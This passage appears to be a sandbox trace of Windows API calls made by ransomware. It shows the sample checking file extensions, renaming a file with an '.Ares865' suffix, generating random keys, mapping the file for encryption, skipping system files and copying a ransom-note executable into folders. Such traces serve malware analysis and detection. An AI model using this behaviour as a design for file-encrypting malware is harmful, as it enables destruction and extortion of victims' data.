lstrlenW (lpString="fol") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fol") returned -1 [0060.195] lstrlenW (lpString="fp3") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fp3") returned -1 [0060.195] lstrlenW (lpString="fp4") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="fp4") returned -1 [0060.196] lstrlenW (lpString="fp5") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="fp5") returned -1 [0060.196] lstrlenW (lpString="fp7") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="fp7") returned -1 [0060.196] lstrlenW (lpString="fpt") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="fpt") returned -1 [0060.196] lstrlenW (lpString="frm") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="frm") returned -1 [0060.196] lstrlenW (lpString="gdb") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0060.196] lstrlenW (lpString="gdb") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0060.196] lstrlenW (lpString="grdb") returned 4 [0060.196] lstrcmpiW (lpString1=".dat", lpString2="grdb") returned -1 [0060.196] lstrlenW (lpString="gwi") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="gwi") returned -1 [0060.196] lstrlenW (lpString="hdb") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="hdb") returned -1 [0060.196] lstrlenW (lpString="his") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="his") returned -1 [0060.196] lstrlenW (lpString="ib") returned 2 [0060.196] lstrcmpiW (lpString1="at", lpString2="ib") returned -1 [0060.196] lstrlenW (lpString="idb") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="idb") returned -1 [0060.196] lstrlenW (lpString="ihx") returned 3 [0060.196] lstrcmpiW (lpString1="dat", lpString2="ihx") returned -1 [0060.196] lstrlenW (lpString="itdb") returned 4 [0060.197] lstrcmpiW (lpString1=".dat", lpString2="itdb") returned -1 [0060.197] lstrlenW (lpString="itw") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="itw") returned -1 [0060.197] lstrlenW (lpString="jet") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="jet") returned -1 [0060.197] lstrlenW (lpString="jtx") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="jtx") returned -1 [0060.197] lstrlenW (lpString="kdb") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="kdb") returned -1 [0060.197] lstrlenW (lpString="kexi") returned 4 [0060.197] lstrcmpiW (lpString1=".dat", lpString2="kexi") returned -1 [0060.197] lstrlenW (lpString="kexic") returned 5 [0060.197] lstrcmpiW (lpString1="x.dat", lpString2="kexic") returned 1 [0060.197] lstrlenW (lpString="kexis") returned 5 [0060.197] lstrcmpiW (lpString1="x.dat", lpString2="kexis") returned 1 [0060.197] lstrlenW (lpString="lgc") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="lgc") returned -1 [0060.197] lstrlenW (lpString="lwx") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="lwx") returned -1 [0060.197] lstrlenW (lpString="maf") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="maf") returned -1 [0060.197] lstrlenW (lpString="maq") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="maq") returned -1 [0060.197] lstrlenW (lpString="mar") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="mar") returned -1 [0060.197] lstrlenW (lpString="marshal") returned 7 [0060.197] lstrcmpiW (lpString1="dex.dat", lpString2="marshal") returned -1 [0060.197] lstrlenW (lpString="mas") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="mas") returned -1 [0060.197] lstrlenW (lpString="mav") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="mav") returned -1 [0060.197] lstrlenW (lpString="maw") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="maw") returned -1 [0060.197] lstrlenW (lpString="mdbhtml") returned 7 [0060.197] lstrcmpiW (lpString1="dex.dat", lpString2="mdbhtml") returned -1 [0060.197] lstrlenW (lpString="mdn") returned 3 [0060.197] lstrcmpiW (lpString1="dat", lpString2="mdn") returned -1 [0060.198] lstrlenW (lpString="mdt") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="mdt") returned -1 [0060.198] lstrlenW (lpString="mfd") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="mfd") returned -1 [0060.198] lstrlenW (lpString="mpd") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="mpd") returned -1 [0060.198] lstrlenW (lpString="mrg") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="mrg") returned -1 [0060.198] lstrlenW (lpString="mud") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="mud") returned -1 [0060.198] lstrlenW (lpString="mwb") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="mwb") returned -1 [0060.198] lstrlenW (lpString="myd") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="myd") returned -1 [0060.198] lstrlenW (lpString="ndf") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="ndf") returned -1 [0060.198] lstrlenW (lpString="nnt") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="nnt") returned -1 [0060.198] lstrlenW (lpString="nrmlib") returned 6 [0060.198] lstrcmpiW (lpString1="ex.dat", lpString2="nrmlib") returned -1 [0060.198] lstrlenW (lpString="ns2") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="ns2") returned -1 [0060.198] lstrlenW (lpString="ns3") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="ns3") returned -1 [0060.198] lstrlenW (lpString="ns4") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="ns4") returned -1 [0060.198] lstrlenW (lpString="nsf") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="nsf") returned -1 [0060.198] lstrlenW (lpString="nv") returned 2 [0060.198] lstrcmpiW (lpString1="at", lpString2="nv") returned -1 [0060.198] lstrlenW (lpString="nv2") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="nv2") returned -1 [0060.198] lstrlenW (lpString="nwdb") returned 4 [0060.198] lstrcmpiW (lpString1=".dat", lpString2="nwdb") returned -1 [0060.198] lstrlenW (lpString="nyf") returned 3 [0060.198] lstrcmpiW (lpString1="dat", lpString2="nyf") returned -1 [0060.198] lstrlenW (lpString="odb") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0060.199] lstrlenW (lpString="odb") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0060.199] lstrlenW (lpString="oqy") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="oqy") returned -1 [0060.199] lstrlenW (lpString="ora") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="ora") returned -1 [0060.199] lstrlenW (lpString="orx") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="orx") returned -1 [0060.199] lstrlenW (lpString="owc") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="owc") returned -1 [0060.199] lstrlenW (lpString="p96") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="p96") returned -1 [0060.199] lstrlenW (lpString="p97") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="p97") returned -1 [0060.199] lstrlenW (lpString="pan") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="pan") returned -1 [0060.199] lstrlenW (lpString="pdb") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="pdb") returned -1 [0060.199] lstrlenW (lpString="pdm") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="pdm") returned -1 [0060.199] lstrlenW (lpString="pnz") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="pnz") returned -1 [0060.199] lstrlenW (lpString="qry") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="qry") returned -1 [0060.199] lstrlenW (lpString="qvd") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="qvd") returned -1 [0060.199] lstrlenW (lpString="rbf") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="rbf") returned -1 [0060.199] lstrlenW (lpString="rctd") returned 4 [0060.199] lstrcmpiW (lpString1=".dat", lpString2="rctd") returned -1 [0060.199] lstrlenW (lpString="rod") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="rod") returned -1 [0060.199] lstrlenW (lpString="rodx") returned 4 [0060.199] lstrcmpiW (lpString1=".dat", lpString2="rodx") returned -1 [0060.199] lstrlenW (lpString="rpd") returned 3 [0060.199] lstrcmpiW (lpString1="dat", lpString2="rpd") returned -1 [0060.200] lstrlenW (lpString="rsd") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="rsd") returned -1 [0060.200] lstrlenW (lpString="sas7bdat") returned 8 [0060.200] lstrcmpiW (lpString1="ndex.dat", lpString2="sas7bdat") returned -1 [0060.200] lstrlenW (lpString="sbf") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="sbf") returned -1 [0060.200] lstrlenW (lpString="scx") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="scx") returned -1 [0060.200] lstrlenW (lpString="sdb") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="sdb") returned -1 [0060.200] lstrlenW (lpString="sdc") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="sdc") returned -1 [0060.200] lstrlenW (lpString="sdf") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="sdf") returned -1 [0060.200] lstrlenW (lpString="sis") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="sis") returned -1 [0060.200] lstrlenW (lpString="spq") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="spq") returned -1 [0060.200] lstrlenW (lpString="te") returned 2 [0060.200] lstrcmpiW (lpString1="at", lpString2="te") returned -1 [0060.200] lstrlenW (lpString="teacher") returned 7 [0060.200] lstrcmpiW (lpString1="dex.dat", lpString2="teacher") returned -1 [0060.200] lstrlenW (lpString="tmd") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="tmd") returned -1 [0060.200] lstrlenW (lpString="tps") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="tps") returned -1 [0060.200] lstrlenW (lpString="trc") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0060.200] lstrlenW (lpString="trc") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0060.200] lstrlenW (lpString="trm") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="trm") returned -1 [0060.200] lstrlenW (lpString="udb") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="udb") returned -1 [0060.200] lstrlenW (lpString="udl") returned 3 [0060.200] lstrcmpiW (lpString1="dat", lpString2="udl") returned -1 [0060.200] lstrlenW (lpString="usr") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="usr") returned -1 [0060.201] lstrlenW (lpString="v12") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="v12") returned -1 [0060.201] lstrlenW (lpString="vis") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="vis") returned -1 [0060.201] lstrlenW (lpString="vpd") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="vpd") returned -1 [0060.201] lstrlenW (lpString="vvv") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="vvv") returned -1 [0060.201] lstrlenW (lpString="wdb") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="wdb") returned -1 [0060.201] lstrlenW (lpString="wmdb") returned 4 [0060.201] lstrcmpiW (lpString1=".dat", lpString2="wmdb") returned -1 [0060.201] lstrlenW (lpString="wrk") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="wrk") returned -1 [0060.201] lstrlenW (lpString="xdb") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="xdb") returned -1 [0060.201] lstrlenW (lpString="xld") returned 3 [0060.201] lstrcmpiW (lpString1="dat", lpString2="xld") returned -1 [0060.201] lstrlenW (lpString="xmlff") returned 5 [0060.201] lstrcmpiW (lpString1="x.dat", lpString2="xmlff") returned -1 [0060.201] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 91 [0060.201] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 1 [0060.202] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.202] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0060.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.203] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.203] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.203] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.204] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x164 [0060.205] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x190000 [0060.447] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.448] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.448] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.449] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.449] CloseHandle (hObject=0x164) returned 1 [0060.449] CloseHandle (hObject=0x15c) returned 1 [0060.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.451] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2=".") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="..") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="windows") returned -1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="bootmgr") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="temp") returned -1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="pagefile.sys") returned -1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="boot") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ids.txt") returned 1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ntuser.dat") returned -1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="perflogs") returned -1 [0060.452] lstrcmpiW (lpString1="MM5O9XQS", lpString2="MSBuild") returned -1 [0060.452] lstrlenW (lpString="MM5O9XQS") returned 8 [0060.452] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat") returned 83 [0060.452] lstrcpyW (in: lpString1=0x2cce494, lpString2="MM5O9XQS" | out: lpString1="MM5O9XQS") returned="MM5O9XQS" [0060.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0060.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2710 [0060.452] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0060.452] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMMR5K9K", cAlternateFileName="")) returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="aoldtz.exe") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2=".") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="..") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="windows") returned -1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="bootmgr") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="temp") returned -1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="pagefile.sys") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="boot") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ids.txt") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ntuser.dat") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="perflogs") returned 1 [0060.452] lstrcmpiW (lpString1="PMMR5K9K", lpString2="MSBuild") returned 1 [0060.452] lstrlenW (lpString="PMMR5K9K") returned 8 [0060.452] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 82 [0060.453] lstrcpyW (in: lpString1=0x2cce494, lpString2="PMMR5K9K" | out: lpString1="PMMR5K9K") returned="PMMR5K9K" [0060.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0060.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e27c0 [0060.453] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0060.453] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIJUQL1C", cAlternateFileName="")) returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="aoldtz.exe") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2=".") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="..") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="windows") returned -1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="bootmgr") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="temp") returned -1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="pagefile.sys") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="boot") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ids.txt") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ntuser.dat") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="perflogs") returned 1 [0060.453] lstrcmpiW (lpString1="RIJUQL1C", lpString2="MSBuild") returned 1 [0060.453] lstrlenW (lpString="RIJUQL1C") returned 8 [0060.453] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 82 [0060.453] lstrcpyW (in: lpString1=0x2cce494, lpString2="RIJUQL1C" | out: lpString1="RIJUQL1C") returned="RIJUQL1C" [0060.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0060.453] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2870 [0060.453] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7c30 [0060.453] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="aoldtz.exe") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2=".") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="..") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="windows") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="bootmgr") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="temp") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="pagefile.sys") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="boot") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="ids.txt") returned 1 [0060.453] lstrcmpiW (lpString1="X9OHK109", lpString2="ntuser.dat") returned 1 [0060.454] lstrcmpiW (lpString1="X9OHK109", lpString2="perflogs") returned 1 [0060.454] lstrcmpiW (lpString1="X9OHK109", lpString2="MSBuild") returned 1 [0060.454] lstrlenW (lpString="X9OHK109") returned 8 [0060.454] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 82 [0060.454] lstrcpyW (in: lpString1=0x2cce494, lpString2="X9OHK109" | out: lpString1="X9OHK109") returned="X9OHK109" [0060.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0060.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2920 [0060.454] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0060.454] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 0 [0060.454] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.454] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0060.454] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0060.454] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2920 | out: hHeap=0x2b0000) returned 1 [0060.454] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0060.454] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned 82 [0060.454] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0060.454] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.454] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: 